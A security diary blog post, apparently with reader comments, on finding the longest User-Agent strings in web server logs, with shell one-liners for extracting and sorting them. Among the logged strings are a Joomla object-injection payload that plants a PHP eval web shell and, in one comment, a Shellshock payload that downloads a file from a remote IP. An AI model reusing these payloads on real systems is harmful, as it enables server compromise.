What is your most unusual User-Agent?
When looking at my web logs, I am always out to hunt for anomalies. Today, after seeing some odd and long user agents, I figured it would be fun to look for the longest once that I can find in my logs. First of all: how?
Fist, I am extracting the User Agent string from my web server access log:
cut -f 6 -d'"' access_log > /tmp/useragents (this may look different for you if you use a different log format)
Next, sorting the result by line length:
cat /tmp/useragents | awk '{ print length, $0 }' | sort -n -s | cut -d" " -f2- | uniq
So finally some of the "winners"
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0 OWASMIME/4.0500 (...) OWASMIME/4.0500 is repeated many times. No idea what this is about. A buggy script?
}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22; O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22; a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22; O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22; s:254:\x22file_put_contents($_SERVER[\x22DOCUMENT_ROOT\x22].chr(47).\x22images\x22. chr(47).\x22main.php\x22,\x22|=|\x5Cx3C\x22.chr(63).\x22php \x5Cx24mujj=\x5Cx24_POST['@123'];if(\x5Cx24mujj!='') {\x5Cx24xsser=base64_decode(\x5Cx24_POST['z0']); @eval(\x5C\x22\x5C\x5C\x5Cx24safedg=\x5Cx24xsser;\x5C\x22);}\x22); JFactory::getConfig();exit;\x22;s:19:\x22cache_name_function\x22; s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22; O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}~\xD9
An exploit for an OLD Joomla issue if I remember right? This stuff still works?
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; Tablet PC 2.0; GWX:MANAGED; GWX:DOWNLOADED; GWX:QUALIFIED; InfoPath.3; MALCJS; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; ms-office; MSOffice 15)
Again. Lots of duplicate content. Do you REALLY have to tell me what version of Outlook you are running? I know you are proud of your tablet...
Oddly enough, no shell shock today.
What is your longest User-Agent if you search your weblogs?
Keywords:
6 comment(s)
My next class:
Network Monitoring and Threat Detection In-Depth | Singapore | Nov 18th - Nov 23rd 2024 |
×
Diary Archives
Comments
-
Longest user agent:
Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Anonymous
Jun 29th 2016
8 years ago
()+{+:;};/usr/bin/perl+-e+'print+"Content-Type:+text/plain\r\n\r\nXSUCCESS!";system("+wget+http://204.232.209.188/images/freshcafe/slice_30_192.png+;+curl+-O+http://204.232.209.188/images/freshcafe/slice_30_192.png+;+fetch+http://204.232.209.188/images/freshcafe/slice_30_192.png+;+lwp-download++http://204.232.209.188/images/freshcafe/slice_30_192.png+;+GET+http://204.232.209.188/images/freshcafe/slice_30_192.png+;+lynx+http://204.232.209.188/images/freshcafe/slice_30_192.png++");'
Longest one this month is someone who's very proud of their tablet:
Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.1;+Trident/7.0;+SLCC2;+.NET+CLR+2.0.50727;+.NET+CLR+3.5.30729;+.NET+CLR+3.0.30729;+Media+Center+PC+6.0;+MDDR;+InfoPath.2;+.NET4.0C;+.NET4.0E;+MS-RTC+LM+8;+Tablet+PC+2.0;+GWX:MANAGED;+GWX:QUALIFIED;+Microsoft+Outlook+14.0.7169;+ms-office;+MSOffice+14)
Anonymous
Jun 29th 2016
8 years ago
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; Tablet PC 2.0; McAfee; InfoPath.3; GWX:DOWNLOADED; GWX:RESERVED; GWX:QUALIFIED; ms-office; MSOffice
or
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.9) Gecko/20100101 Goanna/2.0 Firefox/38.9 PaleMoon/26.2.2Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.9) Gecko/20100101 Goanna/2.0 Firefox/38.9 PaleMoon/26.2.2Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.9) Gecko/201001
Anonymous
Jun 29th 2016
8 years ago
426 chars:
Mozilla/5.0 (Linux; U; Android 6.0; zh-cn; Doov L5P_64_M Build/MRA58K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/1.0.0.100 U3/0.8.0 Mobile Safari/534.30 Tanggula/0.1.0 WebLight/1.4.5Mozilla/5.0 (Linux; U; Android 6.0; zh-cn; Doov L5P_64_M Build/MRA58K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/1.0.0.100 U3/0.8.0 Mobile Safari/534.30 Tanggula/0.1.0 WebLight/1.4.5 xiaoyun_AppSearch/2.1.5
Anonymous
Jun 29th 2016
8 years ago
Agents... lots of Mobile crawlers, etc:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; elertz 2.4.179[128]; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)
Mozilla/5.0 CommonCrawler Node MFEM74FEY7ZZZMQ7DWUZYSIZMHWMR73C7XMMOCFILOY4ZSCAEWCZBJGMOFT6EHU.MHXEUGHG6.RFYCW6TUULJSQE7PNQXZBMOMZAVVIKEMOSWSC6FGBNQTWGNX.cdn0.common.crawl.zone
Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B411 Safari/600.1.4 (compatible; YandexMobileBot/3.0; +http://yandex.com/bots)
Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Mozilla/5.0 (compatible; SurdotlyBot/1.0; +http://sur.ly/bot.html; Linux; Android 4; iPhone; CPU iPhone OS 6_0_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A523 Safari/8536.25
Anonymous
Jun 29th 2016
8 years ago
Anonymous
Jul 1st 2016
8 years ago